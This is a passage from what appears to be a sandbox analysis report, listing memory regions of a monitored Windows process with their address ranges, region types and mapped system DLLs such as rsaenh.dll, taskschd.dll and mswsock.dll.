0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1779 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1780 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1781 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1782 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1783 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1784 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1785 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1786 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1787 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1788 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1789 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1790 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1791 start_va = 0x7ffa123a0000 end_va = 0x7ffa123d3fff monitored = 0 entry_point = 0x7ffa123bae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1792 start_va = 0x7ffa12830000 end_va = 0x7ffa1283afff monitored = 0 entry_point = 0x7ffa128319a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1793 start_va = 0xfff0000 end_va = 0x1006ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000fff0000" filename = "" Region: id = 1794 start_va = 0x7ffa0c150000 end_va = 0x7ffa0c1ebfff monitored = 0 entry_point = 0x7ffa0c1a96a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 1795 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1796 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1797 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1798 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1799 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1800 start_va = 0x3cf0000 end_va = 0x3d11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 1801 start_va = 0x3d20000 end_va = 0x3d41fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d20000" filename = "" Region: id = 1802 start_va = 0x7ffa0fe10000 end_va = 0x7ffa0fecefff monitored = 0 entry_point = 0x7ffa0fe31c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 1803 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1804 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1805 start_va = 0x5a0000 end_va = 0x5adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1806 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1807 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1808 start_va = 0x10070000 end_va = 0x100effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010070000" filename = "" Region: id = 1809 start_va = 0x530000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 1810 start_va = 0x5a0000 end_va = 0x5a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1811 start_va = 0x7ffa0f430000 end_va = 0x7ffa0f465fff monitored = 0 entry_point = 0x7ffa0f440070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2181 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2182 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2183 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2184 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2185 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2186 start_va = 0x7ffa0b300000 end_va = 0x7ffa0b314fff monitored = 0 entry_point = 0x7ffa0b302dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2187 start_va = 0x7ff9fdfd0000 end_va = 0x7ff9fe04ffff monitored = 0 entry_point = 0x7ff9fdffd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2188 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2189 start_va = 0x7ffa12660000 end_va = 0x7ffa126bbfff monitored = 0 entry_point = 0x7ffa12676f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2190 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2191 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2192 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2193 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2194 start_va = 0x7ffa0b7a0000 end_va = 0x7ffa0b7aafff monitored = 0 entry_point = 0x7ffa0b7a1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2195 start_va = 0x7ffa0ac50000 end_va = 0x7ffa0ac59fff monitored = 0 entry_point = 0x7ffa0ac514c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2196 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2197 start_va = 0x530000 end_va = 0x54bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2198 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2199 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2200 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2201 start_va = 0x7ffa0b640000 end_va = 0x7ffa0b6a6fff monitored = 0 entry_point = 0x7ffa0b6463e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2202 start_va = 0x540000 end_va = 0x542fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 2203 start_va = 0x610000 end_va = 0x619fff monitored = 0 entry_point = 0x6115c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 2204 start_va = 0x2360000 end_va = 0x2360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 2205 start_va = 0x530000 end_va = 0x539fff monitored = 0 entry_point = 0x5315c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 2206 start_va = 0x610000 end_va = 0x610fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 2207 start_va = 0x530000 end_va = 0x539fff monitored = 0 entry_point = 0x5315c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 2208 start_va = 0x610000 end_va = 0x610fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 2209 start_va = 0x530000 end_va = 0x539fff monitored = 0 entry_point = 0x5315c0 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\System32\\wshqos.dll" (normalized: "c:\\windows\\system32\\wshqos.dll") Region: id = 2210 start_va = 0x610000 end_va = 0x610fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 2211 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2212 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2213 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2214 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2215 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2216 start_va = 0x8070000 end_va = 0x8169fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008070000" filename = "" Region: id = 2217 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2218 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2219 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2220 start_va = 0x610000 end_va = 0x61dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2221 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2222 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2223 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2224 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2225 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2226 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2227 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2228 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2229 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2230 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2231 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2232 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2233 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2234 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2235 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2236 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2237 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2238 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2239 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2240 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2241 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2242 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2243 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2244 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2245 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2246 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2247 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2248 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2249 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2250 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2251 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2252 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2253 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2254 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2255 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2256 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2257 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2258 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2259 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2260 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2261 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2262 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2263 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2264 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2265 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2266 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2267 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2268 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2269 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2270 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2271 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2272 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2273 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2274 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2275 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2276 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2277 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2278 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2279 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2280 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2281 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2282 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2283 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2284 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2285 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2286 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2287 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2288 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2289 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2290 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2291 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2292 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2293 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2294 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2295 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2296 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2297 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2298 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2299 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2300 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2301 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2302 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2303 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2304 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2305 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2306 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2307 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2308 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2309 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2310 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2311 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2312 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2313 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2314 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2315 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2316 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2317 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2318 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2319 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2320 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2321 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2461 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2462 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2463 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2464 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2465 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 2466 start_va = 0x2360000 end_va = 0x237bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 2467 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2468 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed 